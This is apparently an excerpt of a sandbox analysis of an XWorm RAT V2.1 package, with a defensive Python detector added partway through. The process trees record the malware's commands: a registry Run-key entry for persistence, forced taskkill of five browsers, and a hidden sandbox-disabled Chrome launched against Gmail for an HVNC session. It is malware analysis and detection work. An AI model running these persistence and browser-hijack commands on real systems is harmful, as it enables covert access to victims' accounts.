    "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
    - NTFS ADS
    [level 2] C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe (PID 1908)
        "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - NTFS ADS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        [level 3] C:\Windows\System32\cmd.exe (PID 900)
            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat
            [level 4] C:\Windows\system32\tasklist.exe (PID 896)
                Tasklist /fi "PID eq 1908"
                - Enumerates processes with tasklist
                - Suspicious use of AdjustPrivilegeToken
            [level 4] C:\Windows\system32\find.exe (PID 3272)
                find ":"
            [level 4] C:\Windows\system32\timeout.exe (PID 4876)
                Timeout /T 1 /Nobreak
                - Delays execution with timeout.exe
            [level 4] C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe (PID 3016)
                "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
                - Executes dropped EXE
                - Loads dropped DLL
                - Checks processor information in registry
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious behavior: GetForegroundWindowSpam
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of SetWindowsHookEx
                [level 5] C:\Windows\System32\cmd.exe (PID 1104)
                    "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
                    [level 6] C:\Windows\system32\reg.exe (PID 2596)
                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
                        - Adds Run key to start application
                        - Modifies registry key
-
[level 1] C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe (PID 2392)
    "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"
    - Loads dropped DLL
    - Enumerates connected drives
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
-
[level 1] C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe (PID 1884)
    "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
    - NTFS ADS
    [level 2] C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe (PID 2132)
        "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
        [level 3] C:\Windows\System32\cmd.exe (PID 1168)
            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat
            [level 4] C:\Windows\system32\tasklist.exe (PID 3572)
                Tasklist /fi "PID eq 2132"
                - Enumerates processes with tasklist
                - Suspicious use of AdjustPrivilegeToken
            [level 4] C:\Windows\system32\find.exe (PID 2276)
                find ":"
            [level 4] C:\Windows\system32\timeout.exe (PID 2384)
                Timeout /T 1 /Nobreak
                - Delays execution with timeout.exe
            [level 4] C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe (PID 4348)
                "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
                - Executes dropped EXE
                - Loads dropped DLL
                - Suspicious use of AdjustPrivilegeToken
-
[level 1] C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe (PID 2840)
    "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    [level 2] C:\Windows\explorer.exe (PID 3156)
        "C:\Windows\explorer.exe"
        - Modifies Installed Components in the registry
        - Enumerates connected drives
        - Checks SCSI registry key(s)
        - Modifies Internet Explorer settings
        - Modifies registry class
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SendNotifyMessage
        - Suspicious use of SetWindowsHookEx
        [level 3] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5320)
            "C:\Program Files\Google\Chrome\Application\chrome.exe"
            - Enumerates system info in registry
            - Modifies data under HKEY_USERS
            - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SendNotifyMessage
            [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5372)
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f69778
            [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4348)
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1556 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:2
            [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3020)
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
            [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5152)
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
            [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5128)
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3216 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
            [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2108)
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
            [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5676)
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4560 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
            [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5900)
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
            [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5704)
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:2760
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:4600
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5176 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:2376
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1564 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:14⤵PID:2916
-
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (depth 2)
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5
  PID: 2952
- C:\Windows\SysWOW64\cmd.exe (depth 3)
  Command line: "cmd.exe" /c taskkill /F /IM brave.exe
  PID: 5676
- C:\Windows\SysWOW64\taskkill.exe (depth 4)
  Command line: taskkill /F /IM brave.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 5876
- C:\Windows\SysWOW64\cmd.exe (depth 3)
  Command line: "cmd.exe" /c taskkill /F /IM chrome.exe
  PID: 5684
- C:\Windows\SysWOW64\taskkill.exe (depth 4)
  Command line: taskkill /F /IM chrome.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 5908
- C:\Windows\SysWOW64\cmd.exe (depth 3)
  Command line: "cmd.exe" /c taskkill /F /IM msedge.exe
  PID: 5700
- C:\Windows\SysWOW64\taskkill.exe (depth 4)
  Command line: taskkill /F /IM msedge.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 5896
- C:\Windows\SysWOW64\cmd.exe (depth 3)
  Command line: "cmd.exe" /c taskkill /F /IM firefox.exe
  PID: 5708
- C:\Windows\SysWOW64\taskkill.exe (depth 4)
  Command line: taskkill /F /IM firefox.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 5888
- C:\Windows\SysWOW64\cmd.exe (depth 3)
  Command line: "cmd.exe" /c taskkill /F /IM opera.exe
  PID: 5716
- C:\Windows\SysWOW64\taskkill.exe (depth 4)
  Command line: taskkill /F /IM opera.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 5928
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 3)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" " https://mail.google.com" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious use of SendNotifyMessage
  PID: 3268
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f69778
  PID: 3028
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1720 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:2
  PID: 2132
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1920 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
  PID: 4476
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1984 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
  PID: 5112
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --first-renderer-process --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2672 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1
  PID: 5708
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2700 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1
  PID: 6136
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4080 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1
  PID: 5788
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4200 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
  PID: 5156
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4244 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
  PID: 2896
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4588 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
  PID: 440
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4600 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
  PID: 728
- C:\Program Files\Google\Chrome\Application\chrome.exe (depth 4)
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4616 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
  PID: 1196
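The sequence above is the hidden-browser setup of an HVNC client: cvtres.exe (the .NET resource converter, which csc.exe and vbc.exe only ever launch with switches such as /NOLOGO /READONLY /MACHINE: /OUT:) is started with a loopback address and port instead, five browsers are force-killed through cmd.exe and taskkill, and Chrome is then relaunched against mail.google.com from the same cvtres.exe parent with the sandbox disabled and a profile directory named `Pandora`, which Chrome never creates on its own. The operator ends up with a browser carrying the victim's sessions on a desktop the victim cannot see. The detection logic below is an added example, not part of the sandbox report or of any vendor's tooling. It runs over process-creation events rebuilt from the tree above: the parent PIDs are inferred from the tree depth, parents outside this excerpt are placeholder PID 1, and the two benign controls (the user's own sandboxed Chrome on its default profile, and a csc.exe-style cvtres.exe invocation) are constructed rather than taken from the report.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:  # one process-creation record (Sysmon event 1 / EDR telemetry shape)
    pid: int
    ppid: int
    image: str
    cmdline: str


BROWSERS = {"brave.exe", "chrome.exe", "msedge.exe", "firefox.exe", "opera.exe"}
TASKKILL_RE = re.compile(r"taskkill(?:\.exe)?\s+/F\s+/IM\s+([\w.-]+)", re.I)
IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
# Where Chromium browsers keep the real profile; --no-sandbox plus a --user-data-dir
# anywhere else is the hidden-browser launch.
DEFAULT_PROFILE_MARKERS = (r"\appdata\local\google\chrome\user data", r"\appdata\local\microsoft\edge\user data")


def win_argv(cmdline):
    """Split on unquoted whitespace. A double quote toggles quoting anywhere in a
    token, as CommandLineToArgvW does, so --flag="a b" stays one argument."""
    args, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    return args + (["".join(cur)] if cur else [])


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_browser_hijack(events, min_kills=2):
    """Credit taskkills and browser launches to the nearest ancestor that is not
    cmd.exe/taskkill.exe; flag one that killed >= min_kills browsers and then
    started a browser with --no-sandbox on a non-default profile directory."""
    by_pid = {e.pid: e for e in events}

    def actor_of(e):
        cur = by_pid.get(e.ppid)
        while cur is not None and basename(cur.image) in ("cmd.exe", "taskkill.exe"):
            cur = by_pid.get(cur.ppid)
        return cur

    killed, findings = defaultdict(set), []
    for e in events:  # must be in creation order
        name, actor = basename(e.image), actor_of(e)
        if actor is None:
            continue
        if name == "taskkill.exe":
            m = TASKKILL_RE.search(e.cmdline)
            if m and m.group(1).lower() in BROWSERS:
                killed[actor.pid].add(m.group(1).lower())
        elif name in BROWSERS:
            args = win_argv(e.cmdline)[1:]
            udd = next((a.partition("=")[2] for a in args if a.lower().startswith("--user-data-dir=")), "")
            if ("--no-sandbox" in (a.lower() for a in args) and udd and len(killed[actor.pid]) >= min_kills
                    and not any(mk in udd.lower() for mk in DEFAULT_PROFILE_MARKERS)):
                findings.append({"actor_pid": actor.pid, "actor_image": actor.image,
                                 "killed": sorted(killed[actor.pid]),
                                 "browser_pid": e.pid, "user_data_dir": udd})
    return findings


def detect_cvtres_abuse(events):
    """cvtres.exe is the .NET resource converter; csc/vbc run it with /NOLOGO /READONLY
    /MACHINE:... /OUT:... . An IPv4 literal, or no slash switch at all, marks a hollowed
    host whose memory is worth dumping."""
    hits = []
    for e in events:
        if basename(e.image) == "cvtres.exe":
            args = win_argv(e.cmdline)[1:]
            if any(IPV4_RE.fullmatch(a) for a in args) or not any(a.startswith("/") for a in args):
                hits.append({"pid": e.pid, "args": args})
    return hits


# Constructed from the tree above: parent PIDs follow the tree depth, parents outside this
# excerpt are placeholder PID 1, and the two benign controls are constructed, not from the report.
_CH = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
_CV = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
SAMPLE = [ProcEvent(5320, 1, _CH, f'"{_CH}"'),
          ProcEvent(5372, 5320, _CH, f'"{_CH}" --type=crashpad-handler '
                    r'"--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7'),
          ProcEvent(2952, 1, _CV, f'"{_CV}" 2EA4LO 127.0.0.1 8000 Q4JNC5')]
for cmd_pid, tk_pid, b in [(5676, 5876, "brave.exe"), (5684, 5908, "chrome.exe"), (5700, 5896, "msedge.exe"),
                           (5708, 5888, "firefox.exe"), (5716, 5928, "opera.exe")]:
    SAMPLE.append(ProcEvent(cmd_pid, 2952, r"C:\Windows\SysWOW64\cmd.exe", f'"cmd.exe" /c taskkill /F /IM {b}'))
    SAMPLE.append(ProcEvent(tk_pid, cmd_pid, r"C:\Windows\SysWOW64\taskkill.exe", f"taskkill /F /IM {b}"))
SAMPLE += [ProcEvent(3268, 2952, _CH, f'"{_CH}" " https://mail.google.com" '
                     r'--user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --no-sandbox --mute-audio'),
           ProcEvent(4444, 1, _CV, f'"{_CV}" /NOLOGO /READONLY /MACHINE:ix86 '
                     r'"/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A2B.tmp" "C:\Users\Admin\AppData\Local\Temp\CSC1A2B.tmp"')]

if __name__ == "__main__":
    print(detect_browser_hijack(SAMPLE), detect_cvtres_abuse(SAMPLE), sep="\n")
```

Both rules are keyed on parentage rather than on the browser binary, so the user's own Chrome (sandboxed, default `User Data` profile, no browser kills in its ancestry) passes while the relaunch from under cvtres.exe is reported with the full list of browsers it killed first. The cvtres.exe rule is deliberately narrow: a legitimate compile always carries at least one slash switch, so the absence of any, or an IP literal, is enough to justify pulling that process's memory, which is where the "Detect Xworm Payload" memory hit at the top of this report would come from.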
- C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  - Suspicious use of SetWindowsHookEx
  PID: 4076
- C:\Windows\system32\OpenWith.exe (depth 1)
  Command line: C:\Windows\system32\OpenWith.exe -Embedding
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID: 6096
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe (depth 1)
  Command line: "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
  PID: 444
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe (depth 1)
  Command line: "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
  PID: 5048
- C:\Windows\system32\OpenWith.exe (depth 1)
  Command line: C:\Windows\system32\OpenWith.exe -Embedding
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID: 1712
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (depth 2)
  Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Guna.UI2.dll"
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID: 4944
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 3)
  Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
  PID: 4020
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 4)
  Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5C5312488AE7951256FD535A170B923D --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
  PID: 2024
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 4)
  Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=15B5A64AE6FE350026D67382BD5E688A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context 